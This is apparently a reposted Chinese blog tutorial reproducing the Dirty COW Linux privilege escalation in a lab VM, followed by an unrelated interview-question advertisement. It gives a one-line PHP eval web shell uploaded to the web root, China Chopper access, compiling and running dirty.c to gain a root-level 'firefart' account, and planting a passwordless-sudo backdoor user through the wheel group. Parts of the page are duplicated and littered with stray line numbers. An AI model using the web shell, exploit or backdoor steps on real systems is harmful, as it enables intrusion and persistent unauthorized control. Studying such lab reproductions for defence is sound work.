当前位置:   article > 正文

2024年运维最全Linux脏牛漏洞提权复现_脏牛文件编译命令_脏牛提权版本

脏牛提权版本

![](https://img-blog.csdnimg.cn/20210722201014528.png)


 关闭内核防火墙 



  • 1
  • 2
  • 3
  • 4
  • 5
  • 6
  • 7
  • 8

setenforce 0


![](https://img-blog.csdnimg.cn/20210722201311960.png)


 访问Web网站( 里面啥也没有,主要是为了测试漏洞 )


![](https://img-blog.csdnimg.cn/20210722201453900.png)



**第二步,上传木马,使用中国菜刀连接**


网站根目录上传木马文件( 这里直接写一个木马文件 ),内容为一句话木马,网站的默认根目录是/var/www/html目录



  • 1
  • 2
  • 3
  • 4
  • 5
  • 6
  • 7
  • 8
  • 9
  • 10
  • 11
  • 12
  • 13
  • 14
  • 15
  • 16
  • 17
  • 18

cd /var/www/html/


 ![](https://img-blog.csdnimg.cn/20210722201708395.png)



  • 1
  • 2
  • 3
  • 4
  • 5

vim shell.php


 ![](https://img-blog.csdnimg.cn/20210722201831620.png)



  • 1
  • 2
  • 3
  • 4
  • 5
<?php eval($_POST[-7]); ?>

![](https://img-blog.csdnimg.cn/20210722202049594.png)


 使用中国菜刀连接


![](https://img-blog.csdnimg.cn/20210722202545664.png?x-oss-process=image/watermark,type_ZmFuZ3poZW5naGVpdGk,shadow_10,text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L3dhbmd5dXhpYW5nOTQ2,size_16,color_FFFFFF,t_70)


![](https://img-blog.csdnimg.cn/2021072220264345.png)



#### 漏洞复现


**第三步,查看内核版本,上传对应的脏牛工具**


使用中国菜刀打开虚拟终端,使用id命令查看当前用户


![](https://img-blog.csdnimg.cn/20210722203019657.png)


 uname -a 查看Linux内核版本信息


![](https://img-blog.csdnimg.cn/20210722203144781.png)


 使用中国菜刀打开文件管理,上传脏牛工具到/tmp目录下,Linux只有tmp目录默认有上传和执行权限


![](https://img-blog.csdnimg.cn/20210722203635587.png?x-oss-process=image/watermark,type_ZmFuZ3poZW5naGVpdGk,shadow_10,text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L3dhbmd5dXhpYW5nOTQ2,size_16,color_FFFFFF,t_70)



**第四步,使用脏牛工具进行提权**


进入/tmp目录,编译脏牛工具( 上传的工具属于源码脚本,编译后才能执行)



  • 1
  • 2
  • 3
  • 4
  • 5
  • 6
  • 7
  • 8
  • 9
  • 10
  • 11
  • 12
  • 13
  • 14
  • 15
  • 16
  • 17
  • 18
  • 19
  • 20
  • 21
  • 22
  • 23
  • 24
  • 25
  • 26
  • 27
  • 28
  • 29
  • 30
  • 31
  • 32
  • 33
  • 34
  • 35
  • 36
  • 37
  • 38
  • 39
  • 40
  • 41
  • 42
  • 43
  • 44
  • 45
  • 46

gcc -pthread dirty.c -o dirty -lcrypt


 ![](https://img-blog.csdnimg.cn/20210722204346417.png)


 执行脏牛工具,执行文件即可,后面的数字是密码,可随便定义,



  • 1
  • 2
  • 3
  • 4
  • 5
  • 6
  • 7
  • 8

./dirty 123456


![](https://img-blog.csdnimg.cn/20210722204520341.png)


 提示执行超时以及命令执行失败,不用管,查看用户信息,脚本已经生效,firefart用户具有原本root用户的权限,密码为我们上一步设置的123456



  • 1
  • 2
  • 3
  • 4
  • 5
  • 6
  • 7
  • 8

cat /etc/passwd


![](https://img-blog.csdnimg.cn/20210722204857435.png?x-oss-process=image/watermark,type_ZmFuZ3poZW5naGVpdGk,shadow_10,text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L3dhbmd5dXhpYW5nOTQ2,size_16,color_FFFFFF,t_70)


 使用firefart用户进行远程连接( 此处使用Xshell工具进行连接 )



  • 1
  • 2
  • 3
  • 4
  • 5
  • 6
  • 7
  • 8

ssh firefart@192.168.145.130


![](https://img-blog.csdnimg.cn/20210722205541414.png?x-oss-process=image/watermark,type_ZmFuZ3poZW5naGVpdGk,shadow_10,text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L3dhbmd5dXhpYW5nOTQ2,size_16,color_FFFFFF,t_70)



**第五步,利用提升的权限创建后门用户**


还原/etc/passwd,使用脏牛工具备份的passwd.bak文件替换/etc/passwd文件



  • 1
  • 2
  • 3
  • 4
  • 5
  • 6
  • 7
  • 8
  • 9
  • 10
  • 11
  • 12

mv /tmp/passwd.bak /etc/passwd


![](https://img-blog.csdnimg.cn/20210722211552114.png)


wheel组为普通管理员组,默认不开启,利用这个wheel组来创建后门用户


修改/etc/sudoers配置文件,默认只读,需要添加修改权限



  • 1
  • 2
  • 3
  • 4
  • 5
  • 6
  • 7
  • 8
  • 9
  • 10
  • 11

chmod u+w /etc/sudoers


![](https://img-blog.csdnimg.cn/2021072221090444.png)


 去除/etc/sudoers配置文件中105行的注释,使wheel组生效



  • 1
  • 2
  • 3
  • 4
  • 5
  • 6
  • 7
  • 8

vim /etc/sudoers


![](https://img-blog.csdnimg.cn/2021072221105962.png)



创建普通用户tom,并添加至wheel组,使其拥有管理员权限



  • 1
  • 2
  • 3
  • 4
  • 5
  • 6
  • 7
  • 8
  • 9

useradd tom
passwd tom
gpasswd -a tom wheel


![](https://img-blog.csdnimg.cn/20210722211826810.png?x-oss-process=image/watermark,type_ZmFuZ3poZW5naGVpdGk,shadow_10,text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L3dhbmd5dXhpYW5nOTQ2,size_16,color_FFFFFF,t_70)


 低级用户切换高级用户需要高级用户的密码,而我们创建的后门用户不需要密码即可切换root用户



为了做好运维面试路上的助攻手,特整理了上百道 **【运维技术栈面试题集锦】** ,让你面试不慌心不跳,高薪offer怀里抱!

这次整理的面试题,**小到shell、MySQL,大到K8s等云原生技术栈,不仅适合运维新人入行面试需要,还适用于想提升进阶跳槽加薪的运维朋友。**

![](https://img-blog.csdnimg.cn/img_convert/e948c31714506a44d16f77202b08c992.png)

本份面试集锦涵盖了

*   **174 道运维工程师面试题**
*   **128道k8s面试题**
*   **108道shell脚本面试题**
*   **200道Linux面试题**
*   **51道docker面试题**
*   **35道Jenkis面试题**
*   **78道MongoDB面试题**
*   **17道ansible面试题**
*   **60道dubbo面试题**
*   **53道kafka面试**
*   **18道mysql面试题**
*   **40道nginx面试题**
*   **77道redis面试题**
*   **28道zookeeper**

**总计 1000+ 道面试题, 内容 又全含金量又高**

*   **174道运维工程师面试题**

> 1、什么是运维?

> 2、在工作中,运维人员经常需要跟运营人员打交道,请问运营人员是做什么工作的?

> 3、现在给你三百台服务器,你怎么对他们进行管理?

> 4、简述raid0 raid1raid5二种工作模式的工作原理及特点

> 5、LVS、Nginx、HAproxy有什么区别?工作中你怎么选择?

> 6、Squid、Varinsh和Nginx有什么区别,工作中你怎么选择?

> 7、Tomcat和Resin有什么区别,工作中你怎么选择?

> 8、什么是中间件?什么是jdk?

> 9、讲述一下Tomcat8005、8009、8080三个端口的含义?

> 10、什么叫CDN?

> 11、什么叫网站灰度发布?

> 12、简述DNS进行域名解析的过程?

> 13、RabbitMQ是什么东西?

> 14、讲一下Keepalived的工作原理?

> 15、讲述一下LVS三种模式的工作过程?

> 16、mysql的innodb如何定位锁问题,mysql如何减少主从复制延迟?

> 17、如何重置mysql root密码?

**网上学习资料一大堆,但如果学到的知识不成体系,遇到问题时只是浅尝辄止,不再深入研究,那么很难做到真正的技术提升。**

**[需要这份系统化的资料的朋友,可以点击这里获取!](https://bbs.csdn.net/topics/618542503)**

**一个人可以走的很快,但一群人才能走的更远!不论你是正从事IT行业的老鸟或是对IT行业感兴趣的新人,都欢迎加入我们的的圈子(技术交流、学习资源、职场吐槽、大厂内推、面试辅导),让我们一起学习成长!**
、如何重置mysql root密码?

**网上学习资料一大堆,但如果学到的知识不成体系,遇到问题时只是浅尝辄止,不再深入研究,那么很难做到真正的技术提升。**

**[需要这份系统化的资料的朋友,可以点击这里获取!](https://bbs.csdn.net/topics/618542503)**

**一个人可以走的很快,但一群人才能走的更远!不论你是正从事IT行业的老鸟或是对IT行业感兴趣的新人,都欢迎加入我们的的圈子(技术交流、学习资源、职场吐槽、大厂内推、面试辅导),让我们一起学习成长!**
  • 1
  • 2
  • 3
  • 4
  • 5
  • 6
  • 7
  • 8
  • 9
  • 10
  • 11
  • 12
  • 13
  • 14
  • 15
  • 16
  • 17
  • 18
  • 19
  • 20
  • 21
  • 22
  • 23
  • 24
  • 25
  • 26
  • 27
  • 28
  • 29
  • 30
  • 31
  • 32
  • 33
  • 34
  • 35
  • 36
  • 37
  • 38
  • 39
  • 40
  • 41
  • 42
  • 43
  • 44
  • 45
  • 46
  • 47
  • 48
  • 49
  • 50
  • 51
  • 52
  • 53
  • 54
  • 55
  • 56
  • 57
  • 58
  • 59
  • 60
  • 61
  • 62
  • 63
  • 64
  • 65
  • 66
  • 67
  • 68
  • 69
  • 70
  • 71
  • 72
  • 73
  • 74
  • 75
  • 76
  • 77
  • 78
  • 79
  • 80
  • 81
声明:本文内容由网友自发贡献,不代表【wpsshop博客】立场,版权归原作者所有,本站不承担相应法律责任。如您发现有侵权的内容,请联系我们。转载请注明出处:https://www.wpsshop.cn/w/weixin_40725706/article/detail/777783
推荐阅读
相关标签
  

闽ICP备14008679号